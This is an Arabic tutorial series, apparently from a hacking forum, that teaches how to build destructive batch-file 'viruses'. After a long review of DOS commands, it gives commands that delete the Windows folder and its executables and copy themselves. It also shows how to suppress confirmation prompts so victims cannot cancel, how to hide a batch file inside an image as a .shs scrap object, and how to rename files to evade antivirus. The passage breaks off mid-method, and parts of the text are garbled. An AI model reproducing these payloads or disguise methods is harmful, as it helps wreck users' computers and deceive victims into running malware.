بسم الله الرحمن الرحيم السلم عليكم الدرس الول: الفيروسات) الجزء الأول( من منا ل يعرف الفيروسات و اخطارها؟! و التدمير الممكن تحقيقه بهذه الفيروسات! من يصنع الفيروسات بغرض الذي ,فليس ال مستهتر غبي يستعمل العلم في اشياء مضرة ,و من اخطر الفيروسات التي صنعت حتي الن هو فيروس شرنوبيل ,الذي يقوم بتدمير الجهاز كليا ,اخترعه شاب في الحادي و العشرين من عمره ل يهوي ال التدمير.. مقدمة عن الفيروسات: تصنع الفيروسات ببرامج مثل دلفي و باسكال.. الخ ,اما ما سنصنعه الن ليس فيروسات ,بل برامج مدمرة تقوم بنفس عمل الفيروسات ,و ل يستطيع النورتن كشفها.. أفكار هذه الفيروسات بسيطة و سهلة ,و كلها بأكواد درسناها من قبل ,ولكن لتصميم فيروسك الخاص ,يجب ان يتوافر لديك الذكاء ,انظر الي المثلة و اعرف طريقة صنع هذه الفيروسات ثم اصنع افكار مثلها.. ارجو من كل اخ مسلم عدم استخدام هذه الفيرووس ضد المسلمين بس الدرس الول دا هيكون عن كلم كتير بس غير الفيروسات بس حاجات تساعدنا في تصنيع الفيروسا اول حاجة ابدا بكل اول الدوس
اوامر الدوس دي اوامر الدوس ودي استعن بشرح الخ سوفا من منتدي القراصنة كلمة (DOS) اختصار لـDisk Operating System * تعريف الـ : DOS هو مجموعة من الأوامر والتعليمات التي تتحكم في مكونات الحاسب اللي. دور الـ DOS في جهاز الكمبيوتر :هو حلقة الوصل بين الكمبيوتر والمستخدم. الملفات: إن أهم الخدمات التي يقدمها الـ DOS هي تنظيم حفظ البيانات في الملفات. تعريف الملف :هو عبارة عن وعاء لحفظ البرامج أو النصوص أو البيانات ،وهو أصغر وحدة للحفظ بالنسبة لنظام التشغيل. * تسمية الملفات: ينقسم اسم الملف إلي قسمين: القسم الأول :وهو الأساس ( ROOT ) ويجب أل يزيد طوله عن 8 حروف .وهذا الجزء من اسم الملف ضروري إي يجب وجوده. القسم الثاني :ويسمى المتداد ويجب أل يزيد طوله عن 3 حروف ،ويجب أن يفصل بين السم ) الأساس( و المتداد بعلمة النقطة .( . ) وهذا الجزء من السم اختياري يمكن الستغناء عنه. جميع الملفات التي تنتهي بأحد الإمدادات التالية BAT , EXE , COMقابلة للتحميل والتنفيذ المباشر.
ونبين هنا بعض أشهر أنواع الإمدادات المستخدمة مع أسماء ملفاتها الكاملة: BAT.ملف أوامر تنفذ دفعة واحدة.( BATCH ) COM.ملف برنامج.( COMMAND ) EXE.ملف جاهز للتنفيذ.( EXECUTABLE ) DOC.ملف نصوص أو وثائق.( DOCUMENT ) ASM.ملف مصدر برنامج مكتوب بلغة التجميع ) .( ASSEMBLY BAK.ملف احتياطي.( BACKUP ) BAS.ملف برنامج بيسك.( BASIC ) DBF.ملف قاعدة بيانات.( DBASE FILE ) PAS.ملف برنامج مكتوب بلغة باسكال ) .( PASCAL SYS.ملف تكوين نظام.( SYSTEM ) C.ملف مصدر مكتوب بلغة سي.( C ) الرموز المستخدمة في تسمية الملفات: 1الحروف الأبجدية من A إلي ) Z سواء كانت صغيرة أو كبيرة.( 2الأرقام من 0 إلي. 9 3بعض العلمات مثل ، # ، $ ، % ، & ، ( ) ، { } ) : !.( * الشروط التي يجب مراعاتها عند اختيار اسم الملف: 1طول السم الأساسي للملف من 81 حروف. 2يجب أل يزيد السم الممتد إن وجد عن 3 أحرف.
3أن يفصل بين السم الأساسي والسم الممتد إن وجد بعلمة النقطة.( . ) 4أن يكتب السم الأساسي والسم الممتد بدون فراغات. 5عدم استخدام مفاتيح التحكم وهي ALT ، ) : ( CTRL ، ESCفي أي اسم. 6عدم استخدام الأسماء المحجوزة لنظام التشغيل مثل CONالخاص يلوحة المفاتيح و شاشة العرض أو PRN الخاص باسم الطابعة. 7عدم استخدام الرموز ذات الدللة الخاصة لنظام التشغيل وهي ، = ، + ، ، / ، * ؟(. تنظيم الملفات على القرص: للحصول على ملفات منظمة على القرص يجب إنشاء الدليل ( Directory ) فذلك يسهل التعامل مع الملفات وترتيبها بسهولة. تعريف الدليل :( Directory ) هو عبارة عن مجموعة ملفات توضع تحت مسمى دليل معين. أقسام الأدلة :تقسم الأدلة إلي أربعة أقسام: 1الدليل الرئيسي :وهو الدليل الذي يقوم Dos بإنشائه تلقائيًا عند تشكيل السطوانة وتوضع تحته جميع الملفات المنشأة. 2الدليل الفرعي :وهو الذي ينشأ تحت دليل رئيسي ) .( subdirectory ونظرا لأن مستخدم الكمبيوتر يتعامل مع عدد كبير من الملفات لذلك يفضل أن توزع هذه الملفات في أدلة فرعية.
ويمكن إنشاء الأدلة الفرعية داخل الدليل الرئيسي أو داخل أدلة فرعية أخرى. الفرق بين الدليل الرئيسي والدليل الفرعي :هو أن النظام ينشئ الدليل الرئيسي تلقائيًا ،بينما ينشئ المستخدم الدليل الفرعي. يوجد دليل رئيسي واحد في كل قرص بينما قد يوجد في القرص عدة أدلة فرعية. 3الدليل الأبوي :وهو نوع من الأدلة تتفرع منه أدلة ل أبويًا لهم. فرعية عديدة فيصبح دلي ً ومثال على ذلك: SCHOOLCLASS إن الدليل ( SCHOOL ) في المثال السابق يعتبر دليلً أبويًا للدليل الفرعي.( CLASS ) 4الدليل الحالي :وهو الدليل الذي يكون مستخدما وقت العمل عليه ، وكذلك هو الدليل الذي يتم التعامل مع ملفاته بدون أن يسبقها اسم دليل آخر ل يرتبط بدليل أبوي. * طريقة تحميل نظام التشغيل من الأسطوانة المرنة : هناك طريقتين لعمل ذلك: الطريقة الأولى ) :يجب أن يكون الجهاز مغلق( 1ندخل اسطوانة الدوس في محرك الأقراص.A 2نقوم بتشغيل جهاز الكمبيوتر. الطريقة الثانية) :حين يكون الجهاز يعمل( 1ندخل اسطوانة الدوس في محرك الأقراص.A 2نقوم بالضغط على المفاتيح التالية معا ALT + : . CTRL + DELETE
* رموز محركات الأقراص في نظام التشغيل:( DOS ) 1الأسطوانة المرنة :( Floppy Disk ) ويوجد هناك نوعين من الأسطوانات المرنة وهما: أأسطوانة مرنة حجم 3.5 بوصة. بأسطوانة مرنة حجم 5.25 بوصة. ويرمز لمحرك الأسطوانات المرنة بالرمز A أو.B 2القرص الصلب :( Hard Disk ) ويرمز له بالرمز.C :( CDROM ) 3ويرمز له بالرمز D أو.E * طريقة التنقل بين محركات الأقراص :بالضغط على الرمز ثم نلحقه بـ: * الملفات الساسية لنظام التشغيل الـ ) :( DOS يتكون نظام التشغيل من ثلثة ملفات أساسية تمثل البنية الأساسية للنظام والعمود الفقري له وهي كالتالي: ل : IO.SYS :وهذا الملف خاص بالتحكم في الإدخال أو ً والإخراج. ثانيًا : MSDOS.SYS :وهذا الملف يحتوي على مجموعة كبيرة من الأوامر التي توضع في الذاكرة عند التشغيل. ثالثًا : COMMAND.COM :وهذا الملف يحتوي على جميع أوامر نظام التشغيل الداخلية. * مكونات نظام التشغيل: ينقسم نظام التشغيل إلي ثلثة أجزاء رئيسية: الجزء الأول منه يتحكم في الأجهزة والجزء الثاني عبارة عن مجموعة من التعليمات والأوامر تعمل بصورة
تلقائية ل دخل للمستخدم فيها ول يمكنه التحكم بها وهي مخزنة في ذاكرة القراءة فقط ( ROM ) والتي ليمكن مسحها أو تعديلها والجزء الثالث عبارة عن مجموعة من الأوامر و البرامج تعتبر خدمات للمستخدم وتيسر له استخدام الكمبيوتر. * الختصارات: يستخدم نظام التشغيل ( DOS ) اختصارين اثنين عوضًا عن أسماء الملفات أو جزء منها داخل صيغة الأوامر وهما: (1الرمز : ( ? ) ويستخدم للدللة على غياب حرف واحد فقط من اسم أحد الملفات. (2الرمز : ( * ) ويستخدم للدللة على غياب أي عدد من الحروف) بشرط أن ل يتجاوز 8 أحرف(. * الأوامر: تنقسم أوامر الـ DOS إلى قسمين: 1الأوامر الداخلية : وهي الأوامر التي يتم تحميلها إلى ذاكرة الـ RAM أثناء تشغيل الجهاز ويتم تنفيذها من الذاكرة بمعنى أن هذا النوع من الأوامر ل يستلزم وجود أسطوانة لتنفيذه. من أمثلة الأوامر الداخلية: CLS TIME DATE MD CD RD DIR DEL 2الأوامر الخارجية : وهي الأوامر التي ل يتم تحميلها إلى ذاكرة الـ RAM أثناء تشغيل الجهاز وإنما تبقى على الأسطوانة وليتم تنفيذ إي أمر منها
يشترط وجود اسطوانة نظام التشغيل داخل المشغل المرن أو الصلب. من أمثلة الأوامر الخارجية: FORMAT DISKCOPY DISKCOMP COMP SYS EDIT تنقسم أوامر نظام التشغيل الداخلية والخارجية إلي ستة أنواع: 1أوامر النظام: MEM DATE VER DosKey PROMPT CLS VSAFE MEMMAKER MODE COMMAND MSD TIME DEFRAG 2أوامر السطوانة: SCANDISK CHKDSK FORMAT DISKCOMP
DISKCOPY MSBACKUP SYS LABEL FDISK UNFORMAT VOL :الفهرس أوامر3 APPEND DIR CD RD MOVE DATE DELTREE MD TREE :الملفات أوامر4 TYPE COPY CON COPY ATTRIB DEL REN UNDELETE XCOPY
PRINT FIND EDIT SORT MSAV MORE HELP :الحزمية الأوامر5 REM CALL ECHO FOR IF PAUES SHIFT CHOICE GOTO :الستخدام ونادرة خاصة أوامر6 FASTOPEN MSCDEX CHCP INTERLNK QBASIC DRVSPACE.SYS LOADFIX SHARE FASTHELP
NLSFUNC CTTY INSTALL.HIGH RECOVER DEBUG KEYB
السلم عليكم الدرس الول: الفيروسات) الجزء الثاني(
* شرح لهم الوامر المستخدمة في نظام الـ : DOS 1الأمر ) VER :وهو اختصار كلمة VERSION وتعني إصدار ( وهو من الأوامر الداخلية ووظيفته الستعلم عن رقم إصدار نظام التشغيل الـMS . DOS ومثال على ذلك قم بكتابة الأمر VER في الـ:DOS ثم بالضغط على مفتاح ENTER سيظهر MSDOS . VER 6.22 ملحظة :هذه الإجابة تختلف من جهاز إلي آخر حسب نسخة نظام التشغيل. 2الأمر ) DATE :التاريخ ( وهو من الأوامر الداخلية ووظيفته عرض التاريخ الموجود بالجهاز مع إمكانية تعديله. ومثال على ذلك قم بكتابة الأمر DATE في الـ :DOS ثم بالضغط على مفتاح ENTER سيظهر current Date is THU 032599وكذلك Enter New Date mmddyyللتعديل ولإدخال التاريخ الجديد تسجل ل الشهر ثم اليوم ثم السنة وإذا لم نرغب في كتابة أو ً تاريخ جديد يكفي الضغط على مفتاح الإدخال ENTERبدون كتابة إي شئ. ملحظة :هذه الإجابة طبعًا تختلف من جهاز إلي آخر حسب التاريخ.
شروط كتابة التاريخ في نظام التشغيل:DOS 1نظام التشغيل ل يقبل إي تاريخ قبل سنة.1980 2ل يمكن استخدام التاريخ الهجري. 3ل يمكن كتابة الأشهر بالحروف. 4ل يمكن استخدام النقطتين الرأسيتين : كفاصل بين في التاريخ 5أن تستخدم في كتابة التاريخ النظام الأمريكيmm) (ddyyالشهر ثم اليوم ثم السنة. 3الأمر ) TIME :الوقت ( وهو من الأموامر الداخلية ووظيفته عرض الوقت المسجل داخل جهاز الحاسب مع إمكانية تعديله. ومثال على ذلك قم بكتابة الأمر TIME في الـDOS ثم بالضغط على مفتاح ENTER سيظهر current Time is : 4:40:55.75aوكذلك Enter New Time ل الساعات ثم الدقائق ثم للتعديل وذلك بأن تسجل أو ً الثواني ثم كسر الثواني ثم تحديد الوقت صباحًا أو مساءًا وإن لم ترغب في كتابة وقت جديد يكفيك الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ. ملحظة :هذه الإجابة طبعًا تختلف من جهاز إلي آخر حسب الوقت. 4الأمر ) CLS :وهو اختصار لجملة Clear The Screenوتعني مسح الشاشة ( وهو من الأوامر الداخلية ووظيفته هي تنظيف الشاشة من كافة البيانات التي عليها وإرجاع محث التشغيل إلي أول سطر على الشاشة مهما كان موقعه أثناء تنفيذ الأمر.
ومثال على ذلك قم بكتابة الأمر CLS في الـ: DOS ثم بالضغط على مفتاح ENTER سيتم تنظيف الشاشة من البيانات الموجودة عليها وليس مسح البيانات. 5الأمر PROMPT : وهو من الأوامر الداخلية ووظيفته تغيير شكل محث التشغيل لنظام التشغيل. ومن أهم استخدامات الأمر PROMPT التالي: PROMPT $Dتغيير شكل المحث C إلي علمة تاريخ اليوم PROMPT $Tتغيير شكل المحث C إلي علمة الوقت الحالي PROMPT $Qتغيير شكل المحث C إلي علمة= $$ PROMPTتغيير شكل المحث C إلي علمة$ PROMPT $Vتغيير شكل المحث C إلي رقم إصدار نظام التشغيل 6الأمر ) VOL :وهو اختصار لكلمة ( Volume Label وهو من الأوامر الداخلية ووظيفته عرض اسم الأسطوانة الداخلي ومثال غلى ذلك قم بكتابة الأمر VOL في الـDOS ثم بالضغط على مفتاح ENTER سيظهر Volume in drive C is alwafa ملحظة :هذه الإجابة طبعًا تختلف من جهاز إلي آخر حسب اسم القرص. 7الأمر DIR : وهو من الأوامر الداخلية ووظيفته عرض الملفات الموجودة على الفهرس الحالي ومن خلله نستطيع عرض: 1اسم السطوانة والرقم المسلسل لها.
2اسم الفهرس الحالي والمسار الحالي له. 3عرض الملفات الموجودة بخمس بيانات)اسم الملف نوع الملف) امتداده( مساحة الملف بالبايت) حجم الملف(تاريخ إنشاء الملف وقت إنشاء الملف(. 4عرض الفهارس الموجودة بأربعة بيانات وهي) اسم الفهرسعلمة الفهرس وتكون على الشكل < DIR > بجوار اسم الفهرستاريخ إنشاء الفهرس وقت إنشاء الفهرس.( 5رسالة تعرض إجمالي عدد الملفات الموجودة بالفهرس الحالي والذي يتم عرضه وكذلك المساحة الكلية لهذه الملفات. 6المساحة الحرة أو الشاغرة على السطوانة أو القرص.
بسم الله الرحمان الرحيم الدرس الول: الفيروسات) الجزء الثالث( أهم صور استخدامات الأمر:DIR DIR/Pلعرض الملفات صفحة صفحة DIR/Wلعرض الملفات بعرض الشاشة DIR/Bلعرض أسماء الفهارس والملفات ونوعها فقط DIR/Lلعرض أسماء الفهارس والملفات بالحروف الصغيرة DIR/Sلعرض كل الملفات والفهارس الموجودة بالفهرس الحالي DIR/Oلعرض الفهارس والملفات مرتبة ترتيب أبجدي من A إليZ DIR/OSلعرض الفهارس والملفات مرتبة حسب مساحتها بالبايت من الأصغر إلي الأكبر
DIR/AHعرض الملفات المخفية فقط DIR/ARعرض ملفات القراءة فقط وهي محمية من الإلغاء DIR/ASعرض ملفات النظام فقط DIR/ADعرض جميع الفهارس فقط بدون الملفات DIR/AAعرض الملفات التي تحمل علمة الأرشيف فقط 8الأمر ) MD :وهو اختصار لكلمة ( Make Directory وهو من الأوامر الداخلية ووظيفته إنشاء فهرس فرعي من الفهرس الرئيسي أو إنشاء فهرس فرعي من فهرس فرعي آخر. 9الأمر) CD : وهو اختصار لكلمة Change ( Directoryوهو من الأوامر الداخلية ووظيفته: 1معرفة الفهرس الحالي 2النتقال بين الفهارس إما من: رئيسي إلي فرعي فرعي إلي رئيسي وإذا أردنا معرفة الفهرس الحالي الذي نقف عليه نكتب الأمر CD فقط ثم نقوم بالضغط على مفتاحENTER 10الأمر ) RD وهو اختصار لكلمة Remove ( Directoryوهو من الأوامر الداخلية ووظيفته حذف أو إزالة الفهرس الفرعي، ولحذف أو إزالة إي فهرس فرعي فهناك شرطين: 1إزالة جميع الملفات والبرامج الموجودة داخل الفهرس الفرعي المراد إزالته.
2أل يكون الفهرس الفرعي المراد إزالته هو الذي نقف عليه الن بل يجب أن نكون على فهرس آخر أعلى منه رتبة. 11الأمر COPY : وهو من الأوامر الداخلية ووظيفته نسخ ملف أو مجموعة ملفات في نفس الفهرس أو فهرس آخر أو في أسطوانة أخرى. 12الأمر COPY CON :وهو من الأوامر الداخلية ووظيفته إنشاء وكتابة ملفات نصية جديدة من لوحة المفاتيح وعرضها وطباعتها. ومن عيوب الأمر COPY CON إنه: 1ل يمكن الصعود لسطر قد تمت كتابته وتم الضغط على مفتاح الإدخال.ENTER 2ل يمكن فتح ملف للتعديل به بعد حفظه من نفس الأمر بل يكون من محرر النصوص الموجود مع نظام التشغيل DOS وهو. EDIT ملحظة:لحفظ الملف المنشأ عن طريق الأمر COPY CONقم بعمل إحدى الخطوات التالية: أالضغط على مفتاحي ctrl+z ثم الضغط على مفتاح الإدخال. بالضغط على مفتاح F6 ثم الضغط على مفتاح الإدخال. 13الأمر TYPE :وهو من الأوامر الداخلية ووظيفته عرض محتويات الملفات النصية على الشاشة. ملحظة:يقوم هذا الأمر بعرض الملفات النصية أما الملفات التي من النوع EXECOMSYS فل يمكن عرضها.
14الأمر) REN :وهو اختصار لكلمة ( Rename وهو من الأوامر الداخلية ووظيفته تغيير اسم الملف أو نوعه أو كلهما. مثال):(1 15الأمر ) DEL :وهو اختصار لكلمة ( DELETE وهو من الأوامر الداخلية ووظيفته مسح ملف أو مجموعة ملفات في نفس الفهرس أو في فهرس آخر أو في أسطوانة أخرى. ملحظة :في حال مسح كل الملفات ل بد من ظهور الرسالة التأكيديه التالية: All Files in directory will be deleted Are you Sure Y/N وإذا أردت حذف جميع الملفات أضغط حرف Y وإذا أردت إلغاء العملية اضغط.N 16الأمر PATH :وهو من الأوامر الداخلية ووظيفته فتح مسار أو عدة مسارات على مجموعة محددة من الفهارس على أسطوانة واحدة أو عدة أسطوانات وذلك حتى يسهل التعامل مع الملفات الواقعة عليها من إي موقع ويدرج أمر PATH إلى ملف Autoexec.bat في سطر واحد) لو تكرر الأمر وبصورة مختلفة سيحفظ منه فقط آخر صورة له في آخر سطر ( ويوصف بداخله كل الفهارس التي نرغب بالتعامل معها مباشرة بدون إستخدام الأمر CD للدخول إليها. ملحظات هامة: 1يوضع أمر PATH داخل ملف Autoexec.bat في سطر واحد.
2من الممكن كتابة أمر PATH على إي مشغل أقراص في كل مرة تفتح فيها حاسبك. مثال على ذلك قم بكتابة الأمر PATH على الـ DOS لكي تعرف اسم المسار الموجود بالجهاز. 17الأمر MEM :وهو من الأوامر الخارجية ووظيفته إعطاء تقارير كاملة عن حالة جميع أنواع الذاكرة. 18الأمر MODE :وهو من الأوامر الخارجية ووظيفته: 1التحكم في حجم الكتابة وعرضها على الشاشة. 2إعطاء تفاصيل عن الملحقات المتصلة بالحاسب وما إذا كانت متصلة معه على التوالي أو على التوازي. 19الأمر DOSKEY :وهو من الأوامر الخارجية ووظيفته: 1استدعاء وتعديل اسطر الأوامر وذلك باستدعاء كل ما سبق تنفيذه من أوامر. 2إنشاء ما يسمى بالماكرو ( Macros ) وهو عبارة عن مجموعة من الأوامر تجمع تحت اسم واحد ويعطى لها مفتاح معين لتشغليها بخطوة واحدة. ملحظة هامة :الأمر DOSKEY يقوم بحجز 4 كليو بايت من الذاكرة الأساسية. 20الأمر MSD :وهو من الأوامر الخارجية ووظيفته: 1اكتشاف مواصفات الحاسب من حيث: ) نوع المعالج حجم الذاكرة أنواع مشغلت الأقراص مواصفات نظام العرض وباقي المكونات(. 2الحصول على تقارير فنية تفيد باكتشاف المشاكل التي حدثت على الحاسب مثل تلف شرائح الذاكرة الـ. RAM
21الأمر Command :وهو من الأوامر الخارجية ووظيفته تفسير أوامر نظام التشغيل الداخلي. 22الأمر DEFRAG :وهو من الأوامر الخارجية ووظيفته تتمثل برفع كفاءة التشغيل للقرص الصلب أو القرص المرن حيث إنه يقوم بتجميع الملفات المبعثرة إلي جوار بعضها وبالتالي توفير مساحة إضافية. 23الأمر FORMAT :وهو من الأوامر الخارجية ووظيفته تهيئة الأسطوانة الصلبة أو المرنة. 24الأمر LABEL :وهو من الأوامر الخارجية ووظيفته إعادة تسمية السطوانة أو تعديل إسمها أو مسحه. 25الأمر DISKCOPY :وهو من الأوامر الخارجية ووظيفته نسخ أسطوانة مرنة على أخرى مطابقة لها تماما من حيث النوع والحجم والسعة ويقوم بنسخ كامل الملفات حتى المخفية. ملحظة) : الأمر COPY والأمر XCOPY ل يستطيعان نقل الملفات المخفية(. 26الأمر CHKDSK :وهو من الأوامر الخارجية ووظيفته فحص الأسطوانة وإعطاء تقرير عن حالتها. 27الأمر UNFORMAT :وهو من الأوامر الخارجية ووظيفته إستعادة محتويات أسطوانة ما كانت قد مسحت جميع محتوياتها من خلل الأمر.FORMAT ملحظة هامة: يستطيع الأمر UNFORMAT إعادة محتويات الأسطوانة التي سبق عمل تهيئة لها ولكن بشرط عدم إستخدامها مسبقًا مع الأمر FORMAT عند التهيئة
وإل فأنه يستحيل إعادة محتويات الأسطوانة كما كانت. 28الأمر SYS :وهو من الأوامر الخارجية ووظيفته: 1نسخ ملفات نظام التشغيل MSDOS إلي أسطوانة ما. 2نسخ ملف COMMAND.COM إلي أسطوانة ما. 29الأمر DISKCOMP :وهو من الأوامر الخارجية ووظيفته المقارنة بين اسطوانتين متطابقتين. ملحظة :هذا الأمر ل ينفع التعامل به مع أقراص صلبة على الإطلق. 30الأمر SCANDISK :وهو من الأوامر الخارجية ويستخدم لكتشاف إي أجزاء تالفة على القرص. 31الأمر FDISK :وهو من الأوامر الخارجية ووظيفته تهيئة وإعداد القرص الصلب للتعامل مع نظام التشغيل .DOS 32الأمر TREE :وهو من الأوامر الخارجية ووظيفته عرض أسماء الفهارس المكونة لشجرة الفهارس وكذلك عرض مساراتها. 33الأمر MOVE :وهو من الأوامر الخارجية ووظيفته نقل ملف أو أكثر أو فهرس فرعي من مكان لخر. 34الأمر DELTREE :وهو من الأوامر الخارجية ووظيفته حذف فهرس فرعي بما يحتويه حتى لو كان بداخله ملفات. 35الأمر UNDELETE :وهو من الأوامر الخارجية ووظيفته استعادة الملفات الممحاة بواسطة الأمر.DEL ملحظات هامة:
1عندما يتم حذف ملف بالأمر DEL فإن نظام التشغيل DOSيقوم بتغيير الحرف الأول من هذا الملف وتحويله إلي علمة ؟. 2يمكن استرجاع ملف قبل تخزين إي ملف آخر جديد على الملف السابق. 36الأمر ATTRIB :وهو من الأوامر الخارجية ووظيفته يعرض ويتحكم في صفحات الملف وذلك بتغيير ل ملف خفي أو ملف نظام أو قابل خصائصه كجعله مث ً للقراءة فقط أو غير ذلك. 37الأمر PRINT :وهو من الأوامر الخارجية ووظيفته طباعة الملفات النصية فقط. 38الأمر XCOPY :وهو من الأوامر الخارجية ووظيفته نسخ مجموعة من الملفات أو الفهارس. 39الأمر EDIT :وهو من الأوامر الخارجية وهو عبارة عن محرر نصوص تابع لنظام التشغيل DOS والذي من خلله تتمكن من كتابة وتعديل الملفات. ملحظات هامة: يعالج هذا الأمر جميع عيوب الأمر COPY CON حيث أنه باستخدامه يمكن عمل التي: 1فتح ملف سبق حفظه والتعديل فيه. 2التحرك داخل الملف يمينًا ويسارًا ولأعلى ولأسفل. 3يتم حفظ الملف باستخدام Alt+F ثم نختار أمر Save ثم كتابة أسم الملف. يتم الخروج من الأمر باستخدام Alt+F ثم نختار أمر .Exit
لكي يعمل الأمر EDIT لبد من وجود ملف QBASIC.EXE
بسم الله الرحمن الرحيم
الدرس الثاني: طريقة صناعة الفيروسات عن طريق الملفات الدفاعية 1تعريف الملفات الدفاعية: هي عبارة عن حزمة من اوامر نظام التشغيل DOS يمكننه من خلله استخدام اكثر من امر دوسي في وقت واحد مما يسهل للمستخدم الستخدام مثل استخدام اكثر من امر|format,copy,cd ..... |393 .2طرق صناعة الملفات الدفاعية: الطريقة الولى: .1افتح start < واضغط على Run واكتب commandواضغط علىENTAR .2اكتب امر) (copy conثم اسم الفيروس |564| و المتداد bat ثم اضغطEnter .3اكتب الكود .4لحفظ طريقتان هما .1اضغط على F6 ومن ثمEnter .2اضغط على Ctrl + z و من ثمEnter الطريقة الثانية: .1ابدأ < البرامج < البرامج الملحقة < المفكرةNotepad .2اكتب الكود .3احفظ الفيروس بامتداد bat و حدد الموقع
الطريقة الثالثة: .1ابدأ < البرامجDOS < .2اكتبEdit .3ادخل الكود|312| .4قم بحفظ الملف بمتداد bat و حدد المسار الخاص به 3ايعازات التشغيل: اليعاز الوظيفة Echoتمنع عمل الإيعاز ) تعرض سطر على الشاشة( Nulنقل بدون السؤال نعمل Callالدخول الى ملف @ يمنع عرض السطر على الشاشة Clsيمسح الشاشة Puseيقول للضحية الضغط على اي زر Startبعد هذا المر ضع اسم اي برنامج ليتم تغيله عند تشغيل الفيروس Endيوضع في نهاية الفيروس و هو ينهي الفيروس بعد تنفيذ الوامر n/ايعاز ل \cdالدخول الى ملف \ cdالخروج من ملف y/ايعاز نعم|364| ***ارجوا ان تكون واضحة و هي سهلة الستخدام
4طريقة تشفير الفيروس: اخواني هذه الطريقة ليست لتشفير الفيروس فقط بل لدمج الفيروس و تغير امتداد الفيروس اما سبب تغير المتداد من bat الى exe فسوف اذكر السبب في الدرس الرابع في قسم اسئلة و حلول... يمكنك تغير امتداد الـ Batch عن طريق برنامج Microsoft Visual Basicفي الصداران الخامس و السادس: .1افتح برنامج الفيجول بيسك .2اختر الداة OLD من قائمة الدوات سوف تظهر لك نافذة Insert Object اختر منها Create from File ثم اضغط على Browse واختر الصورة التي تريدها أو مقطع فلم أو اي شيء تريده ثم اضغط علىOK .3اختر اداة OLE مره اخرى وارسم مربع ثاني واختار Create from Fileثم Browse واختر الباتش الذي تريده ثم اضغطOK .4ادخل كود الفروم: : Microsoft Visual Basic 5.0 LE1.DoVerb OLE2.DoVerb : Microsoft Visual Basic 6.0 OLE1.DoVerb OLE2.DoVerb ' me.hideتـقوم باخفاء الفورم
.5من قائمة File اختر Make Project1.exe سوف تأتيك نافذة باسم Make Project اكتب اسم الملف الذي تريد تسميته مثل اكتب |Virus |105 لقد انتهينا من دمج الباتش مع الصوره ولكن امتدادهEXE .6الن سوف نقوم بتغيير امتداد EXE الى امتداد غير معروف| |104من قبل الكثير من مستخدمي النترنت والمتداد هو SHS وهذا المتداد جدا خطير لما فيه من امكانيات التصال مع البرامج الخرى وهوScrap Object والطريقه هي كالتالي: .1قم بتشغيل برنامج WordPad افتح البرنامج وصغر النافذه وافتح مجلد الذي حفظت فيه ملف الباتش+الصورة حاول تنسق النوافذ والن اضغط على البرنامج Virus بالزرار اليسر مره واحده ول ترفع اصبعك عن الزرار ثم اسحبه الى برنامج WordPad سوف ينتقل الملف الى البرنامج بكل سهوله ثانيا اضغط بالزر اليمن على .2الملف الذي انتقل الى WordPad اختر Package Objectثم Edit Package سوف تظهر لك نافذه بأسم Object Packager Package in Documentاختر قائمة Edit ثم Copy Package ثالثا واخيرا اختر المجلد الذي به ملف EditServer ثم اضغط في المكان الفارغ على الزرار اليمن ثم اختر) Paste لصق( سوف يتكون لك ملف شكله غريب باسم Scrap وهذا |535| هوالملف قد تغير امتداده الى shs واذا ضغط عليه دبل
كلك سوف تظهر لك صوره وسوف يشتغل ايضا ملف الباتش الذي دمجته مع الصوره والن قد حصلت على باتش مرفق بصوره. المر Call يتصل في ملف معين اما المر start يبدأ بتنفيذ امر او تشغيل برنامج مثال: (1) كود:PHP call attrib h r c:autoexec.bat >nul اخوي في هذا المثال استخدمنا المر Call للتصال في الملف autoexec و قمنا بتغير خصائصه مثال: (2) كود:PHP start MSPaint في هذا المثال امرنا بتشغيل برنامج الرسام اول ما يبدا الفيروس عمله واريد المستخدم مثل يضغط حرف y ويضغط enter وينفذ امر معين و nو enterيتنفذ امر اخر اخي سوف اعطيك مثال عندما تقوم بالفورمات سوف يسألك الحاسب هل انت متأكد اجب بـ Y,Nهنا نكتب هذا اليعاز لتجاهل الرسالة و ال اذ لم نكتب اليعاز سوف يظهر مثل رسالة تقول للضحية
سوف تقوم بحذف مجلد الوندوز هل انت متأكد من ذلك ...و اكيد سوف يجب بـ ل و هكذا ل يعمل الفيروس... بسم الله الرحمن الرحيم الدرس الثالث: صناعة الفيروسات عن طريق المفات الدفاعية اليوم يا شباب راح انكمل دروس احتراف صناعة الفيروسات عن طريق المفات الدفاعية Batch Files المهم نحن بهذاك الدرس اتعلمنا بعض اليعزات و طريق تشفير و غير ذالك ... المهم هذا الدرس راح انطي امثلة عن العمل مع الملفات اخواني انا في هذه الدروس اعلمكم على كيفية التعامل مع الملفات الدفاعية لنه بعد التعلم سوف تقدر ان تصنع فيروسات بدون مساعدة من اي شخص و تصنعون فيروسات غير مكشوفة ان شاء الله 1اوامر و امثلة: del Delete File del c:\windows\*.txt الشرح : لمسح ملف ما في هذا المثال قمنا بمسح كل ما يوجد في مجلد الوندوز
deltree Delete Folder deltree \y c:\windows الشرح : لمسح ملف اي ليس له امتداد ملف هنا مسحنا ملف وندوز وليس ما بداخل الوندوز ملحوظة هامة هذا المر ليعمل علي الكس بي يعمل علي 98 اوك. call Open Or Call Another .bat File call c:\windos\anything.bat الشرح : هنا قمنا بأتصال مع ملف اخر لتحرير و مسح و نقل... cls Clear The Screen الشرح : هذا المر من اجل تنظيف الشاشة من الحرف echo Allows You To Write Anything echo hahaha i will kill yr computer الشرح : هذا المر من احدى اجمل اليعازات و هو ل كتبة انا دمرتك يجعل الضحية |596| يقرأ المكتوب مث ً يمكنه قرائته اي انه فقط لكتابة السطور goto To Go To a Nother Section In a Batch File start: echo i hack you goto next next: del c:\windows\*.exe الشرح : في هذا المثال استخدمنا المر go to يعمل على |554| الذهاب الى امر اخر لتنفيذه
copy %0 To Copy The Running File To Another Place copy %0 c:MyDocument\anything.bat الشرح : اما عن هذا المر فهو مخصص لنسخ ملف copy .2طريقة تغير امتداد Batch عن طريق: Dos اذهب الى start اكتب command تفتح لك شاشة سوداء مكتوب فيها cd:\windows انت في هذه الحالة تكتب cd.. كرر هذا المر الى ان تجعلها بعد ما تنتهي من هذا المر تذهب الى my cumputer ثم تختار(c:) وضع الفيروس |4| فية ثم اذهب الى الدوس و اكتب هذا المر cd:\>copy virus.exe virus.com virusهو اسم الفيروس تبعك وممكن تغير المتداد الىcom,scr,bat ملحظة ***: اخواني انا متأكد من الطريقة و مجربة و ناجحة %100 اكو شيء ثاني ليس تغير المتداد بل منع مضادات الفيروسات من حذف الفيروس الطريقة سهلة جدا و ذكية في نفس الوقت كتالي:
